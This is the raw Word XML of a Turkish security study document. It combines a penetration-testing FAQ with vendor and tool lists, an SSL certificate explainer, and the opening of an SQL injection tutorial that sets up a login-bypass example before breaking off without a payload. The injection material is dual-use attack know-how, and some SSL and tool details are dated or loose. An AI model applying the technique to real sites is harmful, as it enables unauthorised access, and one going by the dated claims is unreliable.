        <w:t>Pentest yaptıracağınız firmaya ne kadar güvenirseniz güvenin – aranızda muhakkak imzalı ve maddeleri açık bir NDA olmalı – siz yine de işinizi garantiye alma açısından firmanın yapacağı tüm işlemleri loglamanız yararınıza olacaktır. Peki bunu nasıl yaparsınız? Firmanın pentest yapacağı IP adres bilgilerini isteyerek bu IP adreslerinden gelecek tüm trafiği Snort, Tcpdump vb. trafik kaydı gerçekleştirebilen bir yazılım kullanarak loglayabilirsiniz. Özellikle web trafiğini -ki en kritik bilgiler burada çıkacaktır. Snort ile çok rahatlıkla sonradan incelendiğinde anlaşılacak şekilde trafik kaydettirilebilir. Bunun dışında dikkat etmeniz gereken konular şunlardır;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Firmada test yapacak çalışanların CV’lerini isteyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Varsa testi yapacak çalışanların konu ile ilgili teknik sertifikasyonlara (CEH, OSCP vb.) sahip olmasını tercih edin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Testi yapacak çalışanların ilgili firmanın elemanı olmasına dikkat edin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Firmanın daha önceki referansları ile iletişime geçerek bunlardan birkaçına memnuniyetlerini sorun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Mümkünse firma seçimi öncesinde teknik kapasiteyi belirlemek için tuzak sistemler kurarak firmaların bu sistemlere saldırması ve sizin de bildiğiniz açıklığı bulmalarını isteyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Firmadan daha önce yaptığı testlerle ilgili örnek raporlar isteyin. Örnek bir sızma testi raporuna bu adresten ulaşabilirsiniz. https://www.slideshare.net/bgasecurity/szma-testleri-sonuc-raporu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Testlerin belirli IP adreslerinden yapılmasını ve bu IP adreslerinin size bildirilmesini talep edin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Firmaya test için kullandıkları standartları sorun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Firmanın test raporunda kullandığı tüm araçları da yazmasını isteyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest teklifinin diğerlerine göre çok düşük olmamasına dikkat edin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Sızma testi işi firmanın özel işi mi yoksa öylesine yaptığı bir iş mi? Bu sorgu size firmanın konu hakkında yetkinliğine dair ipuçları verecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>5- Pentest yapan firmadan sonuç olarak neler beklemeliyim?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Yöneticilere ve teknik çalışanlara özel iki farklı rapor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Raporların okunabilir ve anlaşılır olması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Testler esnasında keşfedilen kritik seviye güvenlik açıklıklarının anında bildirilmesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest raporunun şifreli bir şekilde iletilmesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Keşfedilen güvenlik açıklarının nasıl kapatılacağı konusunda çözüm önerilerinin sunulması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6- Pentest sonrası nasıl bir yol izlemeliyim?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest yaptırmak ne kadar önemliyse, sonuçlarını değerlendirip aksiyon almak çok daha önemlidir. Maalesef ki yaygın olarak yapılan yanlış sadece Pentest yapıp/yaptırıp raporu incelemek ve çok acil açıkları kapatmak şeklinde oluyor. Pentest sonrası açıklıkların kapatılmaması ve bir sonraki pentest çalışmasında aynı açıklıkların tekrar çıkması sıklıkla karşılaşılan bir durumdur. Gerçekleştirilen çalışmanın katma değerinin yüksek olması için en azından aşağıdaki maddelerin uygulanması önerilmektedir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest raporlarının üst yönetimle paylaşılıp yönetim desteğinin alınması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Sonuçlarının basit açıklıklar olarak değil, bir risk haritası kapsamında yönetime sunulması (bu açıklık hackerlar tarafından değerlendirilirse şu kadar kaybımız olur vb çıkarımlarda bulunularak)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Raporu detaylıca inceleyip her bir açıklığın kimin ilgi alanına girdiğinin belirlenmesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Sistem yöneticileri ve yazılım geliştiricilerle toplantı gerçekleştirilip sonuçların paylaşılması.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Açıklıkların kapatılmasının takibi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bir sonraki pentestin tarihinin belirlenmesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>7- Türkiye’de Pentest yapan hangi firmalar var?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Türkiye’ de bu alanda sektör hızla gelişmektedir. Ayrıca kurumsal firmaların yanında kişisel olarak sızma testi yapan kişiler de bulunmaktadır. Ancak bu konuda Pentest yaptıracağınız kişiyi net olarak tanımıyorsanız, kişi yerine bir firma tercih etmeniz güvenliğiniz açısından daha sağlıklı olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>8- Pentest konusunda kendimi geliştirmek için izlemem gereken yol haritası nasıl olmalıdır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest konusunda kendinizi geliştirmek için öncelikle bu alana meraklı bir yapınızın olması gerekmektedir. İçinizde bilişim konularına karşı ciddi merak hissi ve sistemleri bozmaktan korkmadan kurcalayan bir düşünce yapınızın olması yolun başında sizi ön sıraya taşıyacaktır. Aksi halde işiniz biraz zor demektir. Çünkü “Pentester” olmak demek başkalarının düşünemediğini düşünmek, yapamadığını yapmak ve farklı olmak demektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bu işin en kolay öğrenimi bireysel çalışmalar, kendi kendinize deneyerek öğrenmeye çalışmak, yanılmak sonra tekrar yanılmak ve doğrusunu öğrenmektir. Eğitimler bu konuda destekçi olabilir. Sizin 5-6 ayda katedeceğiniz yolu bir iki haftada size aktarabilir ama hiçbir zaman sizi tam anlamıyla yetiştirmez, “sadece” yol gösterici olur. Pentest konularının konuşulduğu güvenlik listelerine üyelik de sizi hazır bilgi kaynaklarına doğrudan ulaştıracak bir yöntemdir ve gündemi takip etmenizi sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Örnek; http://www.netsectr.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">Bunun yanında Linux işletim sisteminin kullanımı hakkında tecrübe ve temel ağ güvenliği konularında bilgi sahibi olmak, Pentest konusunda sizi 1 adım öne çıkaracaktır. Bu işi ciddi anlamda yapmak </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>istiyorsanız bu iki konuda ne kadar bilgi ve tecrübe sahibi olursanız rakiplerinize karşı o kadar fark atabilirsiniz demektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>9- Pentest için hangi yazılımlar kullanılır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Açık kod ve ticari yazılımlar olmak üzere iki çeşit kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Açık Kod Pentest Yazılımları:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Inguma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Hping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Webscarab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>W3af</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>…bunlardan bazılarıdır. Açık kodlu olarak bilinen çoğu Pentest yazılımı Kali Linux dağıtımı ile birlikte kurulu olarak gelmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Ticari Pentest Yazılımları:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Immunity Canvas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Core Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>HP Webinspect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Saint Ssecurity Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bu araçların yanında araçlar kadar önemli olan “Pentest Metodolojileri” vardır. Bunların da araçlar kadar iyi bilinmesi ve kullanılması gerekir. Bunlar;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>OWASP Guide</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>NIST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>ISSAF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>OSTTM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>SSL Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Açılımı "Secure Sockets Layer" olan SSL Türkçe anlamı ile "Güvenli Giriş Katmanı" demektir. Özellikle alışveriş sitelerinde bulunması zorunlu olan bu özellik sayesinde, alıcı ve site arasında güvenli bir ilişki hedeflenmektedir. Çünkü bu özellik ile korunan sitelerde, girilen kredi kartı bilgileri ya da varsa şifre, kimlik bilgileri gibi özellikler asla üçüncü kişilerin eline geçmeyecektir. Yalnız bu sistemin çalışması için server desteği sağlayan sunucuda bir anahtar yani şifre ve sizin bu özellikten yararlanabilmeniz için de bir sertifikanız olmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>SSL sertifikası şu özellikleri barındırır :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">• Sertifika sahibi kurumun unvanı  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">• Sertifikanın seri numarası ve son kullanma tarihi  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">• Sertifika sahibinin açık anahtarı  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Sertifika veren kurumun ESHS (Elektronik Sertifika Hizmet Sağlayıcısı) elektronik imzası</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Sertifika Nasıl Alınır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>SSL özelliğini kullanabilmek için, sahip olmanız gereken bir sertifika vardır ve bu sertifika ücretli olarak alınabilmektedir. Ya da bazen hizmet aldığınız hosting firması, bu sertifikayı size ücretsiz olarak gönderir. Çünkü zaten hosting firmasına yaptığınız ödemede, bunun ücreti sizden peşin olarak kesilmiştir. Ayrıca bu sertifikayı satın alma ilgili, internet üzerinde çalışan pek çok site bulunmaktadır. Bu sitelerin sunduğu hizmetlerden yararlanarak sertifikayı edinebilirsiniz. Özellikle dünya çapında hizmetleri ile tanınan rapidssl, verisign, digicert gibi siteler SSL sertifikası için en çok başvurulan, güvenilir şirketlerdir. Bu sitelerden SSL sertifikası almadan önce, aralarındaki hizmeti, fiyat seçeneklerini karşılaştırmanızı ve sonra bir karara varmanızı, tavsiye ederiz. Çünkü bu şirketlerin hepsinin, fiyat konusunda çok farklı uygulamaları mevcuttur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>SSL'in Özellikleri Nelerdir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Kullanılan server ve internet tarayıcısı arasındaki işlemleri şifreleyen ve üçüncü şahıslar tarafından yapılacak olan kötü niyetli kullanımın önüne geçen SSL, standart biçimde bir algoritma üzerine kurulmuştur. Size verilecek olan SSL sertifikası ile birlikte, sahip olduğunuz internet sitesinin başında artık https protokolü kullanılacaktır. Bu durum da sizin artık güvenilir bir hizmet sunduğunuz anlamına gelecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>SSL'in önemli diğer özellikleri ise şunlardır: İletilen dokümanların, özellikle de site üzerinden yapılan alışverişlerin, tarih ve saatlerini kaydederek bu işlemi doğrular ve böylelikle bir doküman arşivinin oluşturulmasını sağlamış olur. Bunun dışında internet üzerinden yapılan işlemlerde veriyi gönderen kişinin ve alan tarafın güvenilir olduğundan emin olduktan sonra işlem yapılmasına izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Nasıl Çalışmaktadır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SSL sistemi " Public Key" ya da "Private Key" olarak anılan anahtarların kullanımı ile sağlanmış bir kodlama sistemi üzerinden çalışmaktadır. Bu kodlamada iki anahtar vardır. Ve bu anahtarlar, birbirleri ile mükemmel bir uyum içerisinde çalışırlar. Öyle ki bu anahtarlardan bir tanesinin kilitlediği bir veriyi, ancak diğer anahtar açabilmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>SSL tarafından yaratılan bu anahtarların, yani diğer bir deyişle şifrelerin, bir tanesi her daim sizde kalacak, diğeri de tarafınızdan sizinle bağlantı kuracak olan kişilere gönderilecektir. Bu sayede çift yönlü bir koruma altında olmanız planlanmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Dışarıdan sizin sitenize ulaşmak isteyen bir kimse, elindeki public key ile size güvenilir olduğunu kanıtlar. SSL, 40 bit veya 128 bit arasındaki bir değerde şifreleme kullanılmaktadır. Bu değer, kullanılan SSL'in türüne göre değişmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Kurulumu Hakkında Bilinmesi Gerekenler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Siz SSL sertifikasını edindikten sonra kurulumu gayet basit, hızlıdır. Ancak bu işe başlamadan önce hosting firmanızın sizin için bir IP tanımlamış olması gerekmektedir. Bu tanımlama yapıldıktan sonra Cpanel kontrol paneline girerek Security başlığı tıklanır. Bu başlık altında mevcut olan SSL, TSL maneger sayesinde SSL kurulumu oldukça basit biçimde gerçekleştirebilirsiniz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>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Dünyanın her tarafında, kullanıcılarına; kredi kartı numaraları, kullanıcı bilgileri gibi gizli kalması gereken bilgilerin, ürünlere ve siparişlere ait verilerin saklandığı uç-arka veri depolarıyla hizmet veren web siteleri bulunmaktadır. Ve genel olarak, web sitelerindeki form aracılığı ile alınan girdi ile veritabanındaki bilgiler filtrelendikten sonra sonucu kullanıcıya gönderen bu tür sistemlerde Yapısal Sorgulama Dili (Structured Query Language - SQL) kullanılmaktadır. Uygulama içerisinde kullanılacak parametre değerleri alınırken kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle güvenlik problemleri ortaya çıkmakta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u güvenlik problemleri kullanılarak bir uygulamanın arkasında, bu uygulamaya destek veren veri tabanı üzerindeki bütün bilgilere ulaşılabilir veya bilgiler üzerinde değişiklik yapılabilir. Veya veri tabanı sisteminin komutları kullanılarak kullanılan sunucular üzerinde uygulama harici istenen işlemler de yapılabilir. Bu problemlerden korunmak için de uygulama girdilerini bu tür karakterlere karşı kontrol eden fonksiyonların kullanılmalı ve geniş çaplı uygulamaların bu güvenlik açıklarını taşıyıp taşımadığını anlamak için güvenlik denetimine tabi tutulmalı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İlgilendiren Sektör ve Şirketle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 Özel olarak geliştirilmiş uygulamalar kullanan tüm kurum ve kuruluşlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>* Internet / Intranet üzerinde uygulama geliştiren kuruluşla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1. Bir Uygulama Güvenliği Problemi - "Yapısal Sorgulama Dili Kullanımı"</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Yapısal Sorgulama Dili SQL’in uygulamalarda kullanımına örnek vermek gerekirse;</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Name, Address FROM Users WHERE UserID = ’208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Şeklindeki SQL Deyimi "Users" adlı tablodan "2081" ürün ID si ile veritabanına kayıtlı olan kişiye ait olan isim ve adres bilgilerini dönecektir. Bu noktada muhtemel zayıflık, kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle ortaya çıkmaktadır. Çözümü ise girdilerden bu özel karakterlerin filtrelenmesini sağlayan fonksiyonlar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lastRenderedPageBreak/>
        <w:t>Hızla gelişen internet teknolojileri karşısında yeni pazarda geç olmadan yerini almak isteyen müşterilerine daha kısa sürede daha kullanışlı ve ucuz çözümler sunmak zorunda olan uygulama geliştiriciler bu süreçte güvenlik gibi önemli bir faktörü ikinci plana atmaktadırla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Giderek yaygınlaşan ve medyanın haber potansiyelini oluşturan; çalınan kredi kartı numaraları, yer altı sitelerde dağıtılan müşteri bilgileri, şirket projeleri - yazışmaları yaklaşan tehlikenin habercisi olmakla beraber halen bu tür kayıpların yaratabileceği maddi sonuçları kavrayamayan ve hala "az maliyetle kurtarılan güvenlik projeleri" ’yle övünen yöneticilere uyarı niteliği taşımaktadır. Öyleki -herzaman bir adım önde olmayı amaçlayan- saldırganlar güvenliğin en üst seviyede olması beklenen devlet siteleri de dahil olmak üzere pek çok sisteme yönelik saldırılarına da ara vermeksizin devam etmektedirle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addi ve manevi değere sahip şirketinizi bir anlamda iş ortaklarını olan uygulama geliştiricilerin hazırladıkları uygulama ürünlerine emanet edildiğini düşünürsek, "uygulamalarınıza ne kadar güvenirsiniz?" gibi bir soruya verilecek cevap büyük önem taşımakta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öyle bir ortamda uygun güvenlik çözümü için ayrılmış bütçe bir lüks değil her an yapılabilecek bir saldırıda şirketin uğrayacağı zararı ortadan kaldırmak için alınması gereken önlem niteliği taşımakta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 Örnek Saldırılar - "Yapılacak Hamleleri Önceden Tahmin Edebilmek..."</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Güvenlikte sıkça kullanılan bir deyim; "Saldırganlardan korunabilmek için onlar gibi düşünmelisiniz!..". Saldırganın sisteminize girmek için kullanabileceği yöntemleri bilmek bu saldırılardan korunabilmek için alınan önlemleri daha sağlıklı kıl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Örneklerde kullanacağımız hedef ; Microsoft® Internet Information Server™’ dan Microsoft® SQL Server™’a varsayılan sistem hesabı’ndan (sa) bağlanan ASP tabanlı bir kullanıcı hesabı yöneticisi olacak.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Form.asp : Username ve Password girdisini alan form.Solda...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Login.asp : Veritabanı ile bağlantıya geçen ve girdinin doğruluğunu kontrol eden ASP kodu.</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1. Kötü Amaçlı (’) İmleçleri Yardımıyla İzinsiz Giriş Sağlam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Kullanıcı "Username" &amp; "Password" verisini Login.asp ye yolladıktan sonra .asp kodunun yapacağı iş verilen yoldaki veritabanı ile bağlantı kurup ilgili tabloda Username ve Password sütünlarında gönderilen verinin doğruluğunu kontrol etmek olacaktır. Bu işlem sonucunda eğer sonuç olumluysa kullanıcıya; "Giriş Yapıldı" olumsuzsa; "Geçersiz Kullanıcıadı &amp; Şifre" mesajı veril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Örnekleyecek olursak;</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Username : ilkay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
